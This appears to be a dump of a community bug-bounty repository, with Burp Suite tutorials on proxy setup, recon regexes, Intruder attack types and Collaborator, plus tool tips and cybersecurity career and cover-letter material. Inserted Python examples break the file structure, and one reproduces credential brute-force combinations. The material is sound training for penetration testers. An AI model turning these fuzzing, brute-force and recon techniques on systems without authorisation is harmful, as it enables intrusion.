    "content": "# BUG BOUNTY FAQ - frequently asked questions (Beginner friendly - Under Development)\nNote: Contents inside the **RESETHACKER Community** are there to help our community members; content belongs to the respective authors and the RESETHACKER team.\n\nBugBounty FAQ   | Title\n-- | --\n**0** Getting Started in Cybersecurity Advice | [Be a hacker and break into cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)\n**0** Domain Information - ResetHacker | [Acquisitions, get IP, check ASN, check CIDR range, WHOIS, reverse WHOIS, DNS information etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/BB-FAQ/Domain-Information.md)\n**0** Bugbounty FAQ - Imran Parray | [General questions asked by people](https://github.com/imran-parray/General-Notes)\n**0** Bugbounty Setup HelpDesk | [Got stuck during setup? We have a solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)\n**0** Job/Internship/Resume HelpDesk | [Find cybersecurity jobs/interviews, advice on getting a job, cracking the interview etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n**0** Stay up to date with conferences | [Track all the upcoming conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)\n**0** Trace the latest rewards, CVEs, writeups, tools, reports, disclosures and ongoing trends in the community | [Weekly newsletter to keep up with the infosec community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)\n**0** Build with the community | [Create, build and automate for personal use](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)\n"
  },
  {
    "path": "Bugbounty/burpsuite.md",
    "content": "\n\n# Burp Suite for Pentester\n\nIndex | title\n-- | --\n**0**. [Burpsuite - Getting started, configuration, recon setup and understanding popular features](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)\n**1**. [ProTips for Burpsuite - more updates coming soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/protips.md)\n**2**. [Writing your own Burpsuite extensions - updating soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)\n------------------------------------------------------------------------------------------------------------\n\n# Burp Suite cheatsheet to hunt the vulnerabilities\nCredit : [Ignitetechnologies](https://github.com/Ignitetechnologies/BurpSuite-For-Pentester) \n\nThis cheatsheet is built for Bug Bounty Hunters and Penetration Testers to help them hunt vulnerabilities from P4 to P1 solely and completely with \"BurpSuite\". It is designed so that beginners can understand the fundamentals and professionals can brush up their skills with the advanced options. There are multiple ways to perform all the mentioned tasks; we have performed and compiled this list from our experience. Please share it with your connections and send your queries and feedback directly to [Hacking Articles](https://twitter.com/hackinarticles).\n\n1. [Burp Suite for Pentester: Web Scanner & Crawler](https://www.hackingarticles.in/burp-suite-for-pentester-web-scanner-crawler/)\n2. [Burp Suite for Pentester – Fuzzing with Intruder (Part3)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-3/)\n3. [Burp Suite for Pentester – Fuzzing with Intruder (Part2)](https://www.hackingarticles.in/burpsuite-for-pentester-fuzzing-with-intruder-part-2/)\n4. 
[Burp Suite for Pentester – Fuzzing with Intruder (Part1)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-1//)\n5. [Burp Suite for Pentester – XSS Validator](https://www.hackingarticles.in/burp-suite-for-pentester-xss-validator/)\n6. [Burp Suite for Pentester – Configuring Proxy](https://www.hackingarticles.in/burp-suite-for-pentester-configuring-proxy/)\n7. [Burp Suite for Pentester: Burp Collaborator](https://www.hackingarticles.in/burp-suite-for-pentester-burp-collaborator/)\n8. [Burp Suite For Pentester: HackBar](https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/)\n9. [Burp Suite for Pentester: Burp Sequencer](https://www.hackingarticles.in/burp-suite-for-pentester-burp-sequencer/)\n10. [Burp Suite for Pentester: Turbo Intruder](https://www.hackingarticles.in/burp-suite-for-pentester-turbo-intruder/)\n11. [Engagement Tools Tutorial in Burp suite](https://www.hackingarticles.in/engagement-tools-tutorial-burp-suite/)\n12. [Payload Processing Rule in Burp suite (Part2)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-2/)\n13. [Payload Processing Rule in Burp suite (Part1)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-1/)\n14. [Beginners Guide to Burpsuite Payloads (Part2)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-2/)\n15. [Beginners Guide to Burpsuite Payloads (Part1)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/)\n16. [Burpsuite Encoder & Decoder Tutorial](https://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/)\n17. [Burp Suite for Pentester: Active Scan++](https://www.hackingarticles.in/burp-suite-for-pentester-active-scan/)\n18. [Burp Suite for Pentester: Software Vulnerability Scanner](https://www.hackingarticles.in/burp-suite-for-pentester-software-vulnerability-scanner/)\n19. 
[Burp Suite for Pentester: Burp’s Project Management](https://www.hackingarticles.in/burp-suite-for-pentester-burps-project-management/)\n20. [Burp Suite for Pentester: Repeater](https://www.hackingarticles.in/burp-suite-for-pentester-repeater/)\n"
  },
  {
    "path": "Burpsuite/Assets/Readme.md",
    "content": "\n"
  },
  {
    "path": "Burpsuite/Readme.md",
    "content": "Credit: Vikram - team ResetHacker\n\n**Q: What is Burp and why is it important for penetration testing?**\n\n  Burp Suite is a web application penetration testing tool written in Java. It is also known as an \"intercepting proxy\" because it sits between your browser and the target and lets you inspect, modify and replay every HTTP request and response. \n  It has a large catalogue of extensions that help identify and exploit bugs, but its real power is giving the tester direct control over raw HTTP requests.\n\n**Enterprise - Professional - Community**\n\n\tCommunity Edition - Proxy, Repeater, Intruder (rate limited), Decoder, Comparer, Sequencer and the Extender / BApp Store.\n\tProfessional - adds the active and passive Scanner, Burp Collaborator, Infiltrator, saved project files and the BApps that require Pro.\n\tEnterprise - the scanner packaged as a scheduled, multi-site service rather than an interactive tool.\n\n### Download and run\n* Download [Burp Suite](https://portswigger.net/burp/communitydownload)\n* Run in terminal\n```\n# To run Burp you need Java version 11 to 17; check the installed version first\njava -version\n# -Xmx sets the JVM heap size; large projects need several GB\njava -jar -Xmx4g /path/to/burp.jar\n```\n\n![burpsuite hotkeys](https://user-images.githubusercontent.com/25515871/177658512-18b7310b-98a2-4462-b353-30a4c0b13c42.jpg)\n\n\n**Burp-Proxy-Setup**\n\tThe Proxy tab is probably the most important tab in Burp. This is where you see all of the traffic that passes through the Burp proxy.\n\t\n\t\t○ Check that the proxy listener is running:\n\t\tOpen Burp Suite > Proxy > Options > Proxy Listeners > Running (ticked). The default listener is 127.0.0.1:8080.\n\t\t○ Force your browser to route its traffic through the Burp proxy:\n\t\tBrowser settings > Network settings > Connection settings > Manual proxy configuration\n\t\t(HTTP proxy: 127.0.0.1, Port: 8080, and use the same proxy for HTTPS)\n\t\t○ Import the Burp CA certificate into your browser, otherwise every HTTPS site fails certificate validation:\n\t\tWith the proxy configured,  browse to http://burp and click \"CA Certificate\" (or fetch http://burp/cert) to download it.\n\t\tBrowser settings > Certificates > Import the CA certificate > tick \"Trust this CA to identify websites\" and save.\n\t\tThe certificate is unique to your Burp installation: never import someone else's, and keep it out of browsers you use for anything other than testing.\n\t\n**Note that,** \n    \n    ○ Normally you leave \"Intercept\" off (so you do not have to forward every request by hand) and view the traffic in the \"HTTP history\" tab instead. Only turn \"Intercept\" on when you want to isolate the requests made by one specific feature.\n    ○ HTTP history is where you will spend most of your time looking for something that piques your interest. When looking at the traffic, pay most attention to the Method, URL and MIME type columns. Why?\n\t○ Because a POST method suggests stored XSS, cross-site request forgery and many other vulnerabilities. A URL with an email, username or numeric id in it suggests IDOR. A JSON MIME type suggests a back-end API. Most of this knowledge of what to look for comes with experience.\n\t○ One feature that finds a lot of vulnerabilities and saves time is search: you can search for a word, or a regex, across all of your Burp traffic.\n\t\tFor example, searching for \"url=\" shows every request with a URL-valued parameter, which you can then test for Server Side Request Forgery (SSRF) or open redirect. Searching for the response header \"Access-Control-Allow-Origin\" or the \"callback=\" GET parameter (JSONP) finds candidates for Same Origin Policy (SOP) bypasses. \n\n**[Jason Haddix - to LINK target discovery w/ Burp Suite:](https://twitter.com/jhaddix/status/972926512595746816?lang=en)**\n\t\n\t1) Turn off passive scanning\n\t2) Set forms auto to submit\n\t3) Set scope to advanced control and use string of target name (not a normal FQDN)\n\t4) Walk+browse, then spider all hosts recursively!\n\t5) Profit (more targets)!\n\n**Export subdomains from a file to Burp Suite**\nExport subdomains from a file to Burp Suite by [@tvmpt](https://twitter.com/tvmpt)\n\n```\n# one request per line of <file-name>, 200 at a time, all routed through the Burp listener on 127.0.0.1:8080\n# -L follows redirects so the final host also lands in the sitemap; -k skips TLS verification because Burp presents its own CA\ncat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s\n```\n\n# Recon with BurpSuite\n**Credit : https://github.com/ghsec/webHunt/**\n\n### Set scope\n* Target > Scope > Use advanced scope control > Add > host or IP range == target\n\n![Scope](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-25-10.png)\n\n### Spidering \n* Select all hosts in the sitemap and Spider. \n* Do it again whenever new hosts appear.\n\n### Recon for new Subdomains\n* Collect subdomains the spider did not detect by searching request and response bodies with this regex (replace domain.com with the target's domain):\n```\n(http[s]?:\\/\\/)?((-)?[\\w+\\.]){1,20}domain\\.com\n```\nNote: click the + button, tick Regex and tick \"Auto-scroll to match when text changes\". The pattern requires at least one character before domain.com, so it matches subdomains only, not the bare apex domain.\n\n![ReconSubdomain](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-40-35.png)\n\n### Extract endpoints from js file\nnote: regex taken from LinkFinder by GerbenJavado\n```\n(?:\"|')(((?:[a-zA-Z]{1,10}://|//)[^\"'/]{1,}\\.[a-zA-Z]{2,}[^\"']{0,})|((?:/|\\.\\./|\\./)[^\"'><,;| *()(%%$^/\\\\\\[\\]][^\"'><,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|']{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|^']{0,}|)))(?:\"|')\n```\n![Endpoints](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2009-56-26.png)\n\n### Internal | External IP address\n```\n\\b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\\b\n```\nNote: the pattern also matches invalid dotted quads such as 999.1.1.1 and four-part version numbers, so validate each hit before reporting it.\n![IP](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2010-08-11.png)\n\n\n-------------------------------------------------------------------------------------------------------------------------------\nCredit: Vikram - team ResetHacker\n\n**2.Target -> SITEMAP** \n\n    ○ The sitemap becomes very useful when hitting an undocumented API endpoint, as this view lets you build a picture of the possible endpoints. You can also view the HTTP requests in this tab; clicking on a folder in the sitemap shows only the requests under that path. \n\n\t\n**3.Intruder:**\n\t\t\n    ○ If you are doing any fuzzing or brute forcing with Burp you are probably doing it in the Intruder tab. When you find an interesting request, right click it and choose \"Send to Intruder\".\n\t\t\n\t\t  Go to Intruder > Positions and click \"Clear\". From here your steps vary depending on what you are trying to do.\n\t\t  Eg: we are doing parameter fuzzing. First select the value to modify by highlighting it and pressing \"Add\"; this marks the payload position that will be replaced by our fuzzing payloads. \n\t\t\n\t\tYou may also have noticed that the \"Attack type\" drop down menu is set to \"Sniper\". There are four attack types: \n\t\t\ti. Sniper: uses a single payload list and replaces one position at a time, so it sends positions x payloads requests. \n\t\t\tii. Battering ram: uses a single payload list and puts the same payload into every position at the same time. \n\t\t\tiii. Pitchfork: each position has its own payload list and the lists are walked in parallel (first with first, second with second), stopping at the shortest list. \n\t\t\tiv. Cluster bomb: each position has its own payload list and every combination is tried, so it sends as many requests as the product of the list lengths. \n\t\tOnce you have selected your attack type and the value to be modified, click on the \"Payloads\" sub tab. Here select the payload type and the payload list. \n\t\tFor the payload list we want a list of fuzzing values. For this example I am just going to use the default lists that come with Burp (Professional only), but there are good lists in SecLists: \n\t\t● https://github.com/danielmiessler/SecLists/tree/master/Fuzzing\n\t\tTo use one of Burp's predefined lists click the \"Add from list\" drop down menu and select one; in Community Edition load a file with the \"Load\" button instead.\n\t\tWith the fuzzing list imported, press \"Start attack\".\n\t\tThe next step is to inspect the HTTP responses (sort by status code and response length) to see whether anything stands out. Community Edition throttles Intruder, so many testers use the \"Turbo Intruder\" extension for large payload sets and race conditions.\n\t\n**4.Repeater:**\n     \n     ○ Repeater is where you modify and replay a single request to test for vulnerabilities and security misconfigurations.\n\t   You might have noticed that at the top there are a bunch of different tabs with numbers on them. By default every request you send to Repeater is assigned a number. Whenever you find something interesting, rename the tab so you can find it again later; that is why one of the tabs is labelled SSRF. It is a quick, easy way to keep a record of things. \n\t\n\n**5.Burp Collaborator:**\n\n      ○ A network service (PortSwigger-hosted, or a private server you run yourself) that records out-of-band DNS, HTTP and SMTP interactions coming from the target. It helps discover blind vulnerabilities whose result never shows up in the response you see, such as blind SQL injection, XXE (XML external entity) injection, blind cross-site scripting, SSRF and command injection.\n     \n      \n![burpcollabrator](https://user-images.githubusercontent.com/25515871/176586154-99f71311-4a8d-4dcb-90ff-8fd8dff48a46.png)\n\n        \n\n    \n**6.Burp Recommended Extensions:**\nBurp Extender lets you enhance Burp's functionality by installing extensions created by the community, or even writing your own. \nBurpSuite > Extender > BApp Store \n\nBurp extensions can customize and extend Burp Suite's behavior in numerous ways. A few recommended ones are\n\t\n![burpsuite recommended tools](https://user-images.githubusercontent.com/25515871/176586231-3671f592-f870-4583-a05d-d33d3f4a87d3.png)\n\n"
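The three regexes in the Recon section (subdomain, LinkFinder endpoint, IP address) are meant to be pasted into Burp's search dialog. The script below is an added example written for this page, not part of this README or of webHunt: it runs the same three patterns from Python over a constructed JavaScript sample so you can see exactly what each one catches and misses. The sample text, the target name domain.com and the list of "internal" networks are assumptions. It also validates every IP hit with the `ipaddress` module, because the dotted-quad regex happily accepts octets above 255.

```python
import ipaddress
import re

# Constructed sample of a JavaScript file as it would appear in Burp's HTTP history.
# Hosts, paths and addresses are invented; 203.0.113.0/24 is an RFC 5737 documentation range.
SAMPLE_JS = '''
var api = "/api/v1/users";
fetch('https://api.domain.com/v1/users?id=42');
var img = "../static/logo.png";
loadScript("scripts/app.js");
// X-Backend: 10.0.12.7, edge 203.0.113.5, bogus 999.1.1.1
var cdn = "cdn-assets.domain.com";
'''


def subdomain_pattern(domain):
    '''The README's subdomain regex with the target domain substituted for domain.com.'''
    return re.compile(r'(http[s]?:\/\/)?((-)?[\w+\.]){1,20}' + re.escape(domain))


# The LinkFinder regex from the README, split into its alternatives so each one can be read.
ENDPOINT_RE = re.compile(
    r'''(?:"|')('''                                                                      # opening quote
    r'''((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})'''                   # scheme://host/... or //host/...
    r'''|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})'''                  # /path, ../path, ./path
    r'''|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))'''  # dir/file.ext
    r'''|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|))'''  # file.ext
    r''')(?:"|')'''                                                                      # closing quote
)

IP_RE = re.compile(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b')

# Assumed definition of "internal": RFC 1918, loopback and link-local. Everything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16', '127.0.0.0/8', '169.254.0.0/16')]


def find_subdomains(text, domain):
    '''Unique hosts under `domain`, with any http(s):// prefix the regex captured stripped off.'''
    hosts = set()
    for m in subdomain_pattern(domain).finditer(text):
        hosts.add(re.sub(r'^https?://', '', m.group(0)).lower())
    return sorted(hosts)


def find_endpoints(text):
    '''Unique quoted URLs and paths; group 1 is the value without its surrounding quotes.'''
    return sorted({m.group(1) for m in ENDPOINT_RE.finditer(text)})


def find_ips(text):
    '''Dotted quads split into internal/external; hits with an octet above 255 are discarded.'''
    result = {'internal': [], 'external': []}
    for candidate in sorted(set(IP_RE.findall(text))):
        try:
            ip = ipaddress.IPv4Address(candidate)
        except ValueError:
            continue  # the regex accepts 999.1.1.1; ipaddress does not
        bucket = 'internal' if any(ip in net for net in INTERNAL_NETS) else 'external'
        result[bucket].append(str(ip))
    return result


if __name__ == '__main__':
    print('subdomains:', find_subdomains(SAMPLE_JS, 'domain.com'))
    print('endpoints:', find_endpoints(SAMPLE_JS))
    print('ips:', find_ips(SAMPLE_JS))
```

Two things the sample makes visible: the subdomain pattern never returns the apex domain.com itself (it needs at least one character before it), and the IP pattern returns 999.1.1.1 until something validates it, so a Burp search hit for either pattern still needs a second look before it goes into a report.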
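To make the four Intruder attack types concrete, here is an added example written for this page (it is not Burp's code and not part of this README) that reproduces how each type combines payload positions with payload lists. The request body, the § markers, the usernames and the passwords are constructed for illustration; the number of requests each function yields is the number Intruder would send for the same configuration.

```python
import itertools

# Constructed example: the body of a login request with two Burp-style payload positions,
# marked with § exactly as Intruder's Positions tab shows them. Nothing here is a real target.
TEMPLATE = 'user=§test§&pass=§test§'
USERS = ['admin', 'root']
PASSWORDS = ['password', 'letmein', '123456']


def base_values(template):
    '''The current value inside each § pair, left to right.'''
    return template.split('§')[1::2]


def render(template, values):
    '''Put one value into each position and return the request text.'''
    fixed = template.split('§')[0::2]
    if len(values) != len(fixed) - 1:
        raise ValueError('need exactly one value per payload position')
    out = fixed[0]
    for value, tail in zip(values, fixed[1:]):
        out += value + tail
    return out


def sniper(base, payloads):
    '''Single list: each position takes every payload in turn while the others keep their base value.'''
    for i in range(len(base)):
        for p in payloads:
            yield tuple(p if j == i else base[j] for j in range(len(base)))


def battering_ram(base, payloads):
    '''Single list: the same payload goes into every position at once.'''
    for p in payloads:
        yield tuple(p for _ in base)


def pitchfork(base, payload_sets):
    '''One list per position, walked in parallel; stops when the shortest list runs out.
    The base values are not needed because every position is always replaced.'''
    yield from zip(*payload_sets)


def cluster_bomb(base, payload_sets):
    '''One list per position; every combination, i.e. the product of the list lengths.'''
    yield from itertools.product(*payload_sets)


def run_attack(attack, template, payloads):
    '''Return the requests an attack type would send for this template and payload configuration.'''
    return [render(template, values) for values in attack(base_values(template), payloads)]


if __name__ == '__main__':
    for attack, payloads in ((sniper, USERS), (battering_ram, USERS),
                             (pitchfork, [USERS, PASSWORDS]), (cluster_bomb, [USERS, PASSWORDS])):
        requests = run_attack(attack, TEMPLATE, payloads)
        print(attack.__name__, len(requests), 'requests, e.g.', requests[0])
```

With two users and three passwords the counts are 4 (sniper), 2 (battering ram), 2 (pitchfork) and 6 (cluster bomb); pitchfork is the one to pick when the lists are already paired (leaked username/password pairs), cluster bomb when they are not, and the product grows fast enough that the rate-limited Community Intruder is quickly the bottleneck.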
  },
  {
    "path": "Burpsuite/protips.md",
    "content": "# Pro Tips for Burp Suite\n\n[Author b1twis3](http://b1twis3.ca/burpsuite-30-pro-tips/) | #BurpSuiteTips\n\n## Sample : \n**[1/30](https://twitter.com/fasthm00/status/1228118057144537088)**  | \n      \n      Instead of using many tools to do multiple levels of encoding or string manipulation, \n      you can do all of that and MORE using the #Hackvertor extension by @garethheyes in just a couple of clicks! \n\n**[2/30](https://twitter.com/fasthm00/status/1228544097679527937)**  | \n    \n     #SleepyPuppy is one of the blind XSS management frameworks by @netflix that integrates with BurpSuite.\n     - Manage Assessments and Payloads (Burp or SP)\n     - Integration with Repeater and Intruder\n     - Logs and Statistics \n     - Active Scan\n     - Multiple Users\n\n**[3/30](pic.twitter.com/G1FYXLV8WC)**  |   \n\n      Applying session handling & macro to a 3rd party tool (Sqlmap) and excluding a cookie value from the altering. \n      Note that I just used the profile endpoint and the /login RESTful api for testing purposes. \n\n**[4/30](https://t.co/oAtqGgubEu)(pic.twitter.com/xapBjWNwAa)** | \n      \n      Deploying Private BurpSuite Collaborator in an AWS EC2 Instance (Automated). \n      You could use the AWS console to do it manually as well! Note that this is the basic implementation of the server.\n\n**[5/30](pic.twitter.com/s7LwoPGGk2)** |   \n       \n      Creating sequences of requests/steps using the BurpSuite extension #Stepper.\n      Another #Tip: \n      No need to be an expert in #RegEx to use Stepper, just use BurpSuite Sequencer (Select! Then copy the RegEx) \n      BUT it's good to know RegEx ofc! \n\n**[6/30](pic.twitter.com/3t6ECg0W6U)** | \n       \n       A short but valuable tip when it comes to automation!\n       Generating scripts such as Python, cURL, PowerShell and other scripting languages to reissue a selected HTTP request. 
\n\n**[7/30](https://t.co/qYA50Ffw1H)** |\n      \n      Now you can match responses based on specific conditions and push the matched strings/body to your slack/custom server.\n      – Customize the push notification\n      – Timer\n      – Match all the callbacks.\n\n"
  },
  {
    "path": "CONTRIBUTING.md",
    "content": "# Contribution Guidelines\n\nPlease note that this project is released with a [Contributor Code of Conduct](code-of-conduct.md). By participating in this project you agree to abide by its terms.\n\n## Submitting a pull request\n\nIf you would like to contribute to a ResetHacker community repository, this is how you do it.\n\n<br>\n\n- Fork this repository\n- Clone your fork\n- Add or make the changes on a branch\n- Commit, push and open a pull request against this repository\n- Wait for your pull request to be reviewed and merged!  \n\n\n## Updating your Pull Request\n\nSometimes a maintainer of a ResetHacker community repository will ask you to edit your pull request before it is included. This is normally due to spelling errors or because your PR did not match the ResetHacker guidelines.\n"
  },
  {
    "path": "Contributors.md",
    "content": "# Contributors\n\nWe are very grateful to the following people who have contributed to this project.\n\n"
  },
  {
    "path": "CyberSecurityJobs/Careers",
    "content": "1. | [cyber-security-careers/](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)\n\n# Security Operations (SOC L1 & L2 Team)\n\nSUMMARY:  \nWhat happens when antivirus is triggered, a firewall rule fires, or some malware starts sending data to an outside server? These events land on the SOC dashboard.\n\n  1. Monitor and analyse for malicious activity (for example by reviewing Event Viewer on a Windows machine).\n      Security analysts receive log data from each machine, search for specific events or failures, analyse them and write a report; that is why the L1 team are called security analysts.\n\n  2: Project review\n  3: Use tools such as Splunk (SIEM) \n  4: Incident response \n  5: General CVE and latest vulnerability updates \n  \n## Roles and responsibilities of an entry-level SOC Analyst\n\t  • Perform threat analysis\n\t  • Monitor network for malicious activity\n\t  • Perform risk analysis, security assessments, and vulnerability testing\n\t  • Maintain log analysis\n\t  • Application/ mobile security\n\t  • Vulnerability scanning in software and hardware\n\t  • Coordinate with other analysts and departments for network security\n\t  • Investigate, document, and report all security issues\n\t  • Implement and maintain security protocols\n\t  • Involved in security audits – internal and external\n\t  • Anticipate threats and alerts to avoid their occurrence\n\t  • Coordinate with vendors on security plans\n\t  • Analyse breaches to determine their root cause\n\n  From <https://blog.eccouncil.org/become-a-soc-analyst-job-role-expectation-and-salary/?_ga=2.146323316.1731529884.1632004544-1782675224.1632004544> \nPre-requisite to get into SOC Level 1 –\n\n\n## COURSE: Security Operations Center | Certified SOC Analyst | CSA | EC-Council (eccouncil.org) \n\n    1. Security Operations and Management\n    2. Understanding Cyber Threats, IoCs, and Attack Methodology \n    3. Incidents, Events, and Logging\n    4. Incident Detection with Security Information and Event Management (SIEM)\n    5. Enhanced Incident Detection with Threat Intelligence\n    6. Incident Response\n    \n\n\nInterview questions:\n    What is a SOC and what does a security analyst do?\n    Data leaks and the high-level steps of data loss prevention\n    Phishing, vishing and how to prevent them \n    Explain how DNS works \n    Some examples of web server vulnerabilities and how to prevent them.\n    How to protect against SQL injection \n    Popular port numbers and why certain ports are closed {80, 22, 443, 58 etc. and an understanding of each port}\n    Hashing vs encryption \n    Some security vulnerabilities from 2021 and 2020\n    Explain HTTPS and SSL/TLS \n"
  },
  {
    "path": "CyberSecurityJobs/CoverLetter.md",
    "content": "# Cover letter tips for Cybersecurity Jobs :\n \n 1. Highlight your experience.\n 2. Show your passion for the job and talk about projects (if any).\n 3. Trim and tailor your resume to the job description.\n 4. Re-read your cover letter and resume and know them well before the interview.\n\n\n*___________________(eg Penetration Tester, Security Analyst etc) Cover Letter Example 1*\n\n    I am excited to be applying for the ___________________ position at Topdown Security. I have more than five years of experience in the information security field and have been working as a ___________________ for the past two years. I am confident that I have the skills and experience that you are looking for in this role.\n\n    I am motivated by the challenge of finding and exploiting vulnerabilities in systems and enjoy the satisfaction of helping an organization improve their security posture. I have a strong technical background and am proficient in a variety of security assessment tools and techniques. I am also experienced in working with clients and have a proven track record of delivering quality results on time and within budget.\n\n    I am committed to continuing to grow as a ___________________ and am excited about the opportunity to join Topdown Security and learn from the best in the industry. I believe that my skills and experience would be a valuable addition to your team, and I look forward to discussing this opportunity further with you.\n\n\n*___________________(eg Penetration Tester, Security Analyst etc) Cover Letter Example 2*\n\n    I am writing in regards to the ___________________ opening that I saw on your website. I am confident that I have the skills and qualifications that you are looking for.\n\n    For the past three years, I have been working as a ___________________. In that time, I have performed hundreds of tests, successfully identifying vulnerabilities in systems. I have also been responsible for developing and implementing security measures to protect systems from future attacks.\n\n    My skills go beyond just identifying vulnerabilities. I am also an expert in penetration testing tools and techniques. I am able to quickly and efficiently find and exploit security holes in systems.\n\n    I am confident that I can be a valuable asset to your company. I am a hard worker who is always willing to go the extra mile. I am also a team player who is able to work well with others.\n\n    Please contact me to discuss any questions you may have. I look forward to hearing from you.\n\n    Sincerely,\n\n    Your name\n\n*___________________(eg Penetration Tester, Security Analyst, Network Administrator etc) Cover Letter Example 3*\n\n    I am writing to express my interest in the ___________________ position that you have posted. I believe that I would be a great fit for this position as I have extensive experience in the field of ___________________ and security assessment.\n\n    I have been working in the IT industry for over 10 years, with most of my experience being in the field of information security. I have worked on many projects ranging from small business security assessments to enterprise-level network security assessments. I have also worked on several ___________________ engagements, including vulnerability assessments, source code reviews, and wireless assessments.\n\n    My background includes working as a ___________________(eg Penetration Tester, Security Analyst, and Network Administrator). My core competencies include performing vulnerability assessments, penetration testing, and security assessments. I am also skilled in the use of various security tools such as Nessus, Metasploit, Wireshark, and Netcat.\n\n    I am confident that my skills and experience will make me an asset to your organization. I look forward to hearing from you soon.\n\n\n\nSource : https://climbtheladder.com/penetration-tester-cover-letter/\n"
  },
  {
    "path": "CyberSecurityJobs/CybersecuityDiscipline.md",
    "content": "\nAfter reading this I hope you will understand which disciplines best fit your abilities, experience, and interests in a cybersecurity career.\n\nReference from Cybersecurity Career Guide - By Alyssa Miller \n\n![Cybersecurity disciplines and jobs](https://user-images.githubusercontent.com/25515871/180645636-0114e9ef-b3af-4fc6-88ff-ed4ccdcba52a.png)\nNote : Each of these disciplines, depicted in figure 2.1, categorizes numerous job roles that are constantly evolving and changing. \n\n          Security operations (SOC team)\n          Digital forensics and incident response (DFIR)\n          Security architecture and design\n          Security assessment and verification (vulnerability assessments, pentesting, red teaming etc.)\n          Application, software, and product security\n          Governance and compliance\n          Education and awareness\n          Sales and sales support\n          Leaders and executives\n          \n\n**Security operations** (people on the cybersecurity front lines):\n\n  The skill sets of these people tend to be wide ranging as they are ultimately responsible for maintaining security\n  posture across all technologies within an organization. The responsibilities within security operations therefore are\n  wide reaching. At the core of security operations is typically the security operations center (SOC). \n  The function of the SOC is to monitor, prevent, detect, investigate, and respond to \n  cyber threats around the clock. SOC teams are also charged with monitoring and protecting the organization's assets, including\n  intellectual property, personnel data, business systems, and brand integrity.\n\n  The security operations role also interfaces with many of the other roles that we will discuss. For instance, \n  when an alerted event turns out to be an attack, they may need to engage the incident response team to provide \n  a more sophisticated response to the problem (more on that soon). They also need to be aware of the current threat landscape,\n  so receiving regular information from threat intelligence resources is crucial.\n\nAdvice:\n      \n      For many who are looking to begin a career in cybersecurity, security operations is where they start. Security operations\n      roles often work with automated systems and repeatable tasks that lend themselves well to on-the-job learning and training. \n      Additionally, individuals in these roles can easily leverage previous IT experience in their daily job functions.\n\n      Finally, because of the nature of the role and the wide-ranging responsibilities over various forms of technology,\n      security operations is a terrific way to gain exposure to a lot of the technologies and concepts that the cybersecurity \n      teams are charged with defending.\n      \n      \n**Digital forensics and incident response (DFIR)** focuses on the identification, investigation, and remediation of cyberattacks.\nDFIR has two main components:\n\n    Digital Forensics: A subset of forensic science that examines system data, user activity, and other pieces of digital evidence\n                        to determine if an attack is in progress and who may be behind the activity.\n    Incident Response: The overarching process that an organization will follow in order to prepare for, detect, contain, and recover from a data breach.\n    \nWhereas the SOC is responsible for evaluating potential incoming attacks and taking initial steps to defend against\nthem, they will typically escalate to incident response (IR) personnel if a more coordinated and specialized level of\nresponse is needed or if the breadth of the attack involves extensive portions of the environment.\n\n"
  },
  {
    "path": "CyberSecurityJobs/For_Jobs.md",
